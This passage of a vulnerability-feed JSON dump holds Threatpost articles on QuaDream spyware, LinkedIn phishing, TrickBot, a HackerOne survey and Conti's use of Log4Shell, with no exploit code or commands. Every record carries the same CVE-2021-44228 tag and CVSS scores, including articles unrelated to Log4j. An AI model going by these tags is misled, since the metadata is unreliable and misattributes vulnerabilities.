This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. 
According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. 
According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. 
Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:40", "description": "Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the \u201cGreat Resignation\u201d in full swing, cybercriminals are having an easy time finding their next victim.\n\nJust since Feb. 1, analysts have watched [phishing email attacks impersonating LinkedIn](<https://www.egress.com/resources/cybersecurity-information/phishing/linkedin-phishing-attacks>) surge 232 percent, attempting to trick job seekers into giving up their credentials.\n\n\u201cCurrent employment trends help to make this attack more convincing,\u201d a new report from Egress said. \u201c\u2018The Great Resignation\u2019 continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.\u201d\n\nThe emails had subject lines that would be enticing to job hunters hoping to get noticed, like, \u201cWho\u2019s searching for you online,\u201d \u201cYou appeared in 4 searches this week\u201d or even \u201cYou have 1 new message,\u201d the Egress team said.\n\nThe [phishing emails](<https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/>) themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. 
The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.\n\nEven the email\u2019s footer lifted the address of LinkedIn\u2019s headquarters and included \u201cunsubscribe\u201d links to add to the email\u2019s authenticity, the analysts pointed out.\n\n\u201cYou can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,\u201d the report said.\n\n[LinkedIn phishing email (image)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16154716/linkedin-phsihing-email.png>)\n\nLinkedIn phishing email. Source: Egress.\n\nOnce a victim clicked the malicious links in the email, they were directed to a site that harvested their LinkedIn logins and passwords.\n\n\u201cWhile the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,\u201d the analysts added. \u201cCurrently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.\u201d\n\nUPDATE (Feb. 17, 2022, 09:18): LinkedIn sent the following statement to Threatpost:\n\n\u201cOur internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on [two-step verification](<https://www.linkedin.com/help/linkedin/answer/544/turn-two-step-verification-on-and-off?lang=en>). 
To learn more about how members can identify phishing messages, see our Help Center [here](<https://www.linkedin.com/help/linkedin/answer/5342/phishing-emails?lang=en>).\u201d\n\n## **Data Scraping Attacks on Job Seekers**\n\nAttackers are not only using potential job leads to trick targets into giving up their credentials: in a separate report, Imperva detailed how it stopped the [largest bot attack](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>) the company has seen to date, on a global job-listing site.\n\nImperva didn\u2019t name the site, but said that it was bombarded with 400 million bot requests from 400,000 unique IP addresses over four days, in an attempt to scrape all of its job seekers\u2019 data.\n\nThe Imperva team added that these types of web-scraping attacks are common and can result in \u201clower conversion rates, skewed marketing analytics, decrease in SEO ranking, website latency, and even downtime (usually caused by aggressive scrapers).\u201d\n\nBut as Imperva pointed out in its report, data scraping is one of those cybersecurity gray areas. Collecting publicly available information isn\u2019t itself a data breach, but collected in mass quantities, it can be a weapon wielded against users in social-engineering attacks.\n\nLast summer, a massive [data-scraping attack against LinkedIn](<https://threatpost.com/linkedin-data-scrape-victims-targeted-attackers/167473/>) was discovered to have collected at least 1.2 billion user records that were later sold on underground forums. 
At the time, LinkedIn reiterated that the [scraped data was public information](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>), not private information, and didn\u2019t qualify as a breach.\n\nLinkedIn isn\u2019t really at fault here, according to Yehuda Rosen, senior software engineer at nVisium.\n\n\u201cThis has little to do with LinkedIn specifically \u2013 they\u2019re not doing anything wrong here,\u201d Rosen explained to Threatpost. \u201cIt boils down to the fact that LinkedIn has hundreds of millions of members \u2013 many of whom are very accustomed to seeing frequent legitimate emails from LinkedIn \u2013 and may inevitably click without carefully checking that each and every email is the real deal.\u201d\n\nThat leaves it to individual users to be mindful of the information they expose publicly and how it could be used to trick them into clicking on a malicious link.\n\n\u201cWhile I don\u2019t believe that this will hurt LinkedIn\u2019s brand, this does reiterate the importance of email phishing education,\u201d Ray Kelly, with NTT Application Security, told Threatpost by email. \u201cGiven these emails are coming from a legit LinkedIn email address makes it especially difficult to identify the danger. My rule is to never click on email links. Always visit the site directly.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[**_LIVE roundtable discussion_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
_**[**_REGISTER NOW_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T21:15:47", "type": "threatpost", "title": "Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T21:15:47", "id": "THREATPOST:CAA9AA939562959323A4675228C233A5", "href": "https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. 
They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. 
In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. 
As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. 
\u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to 
trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy, and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38 percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. 
Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. 
In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack 
chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes \u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share.** 
Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast.** Kerberoasting, a common post-exploitation technique that exploits a combination of weak encryption and poor service-account password hygiene, extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. 
Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named [Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note [lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one of the malware strains that have been thrown at vulnerable servers over the course of the Log4j saga. 
Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation-state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in 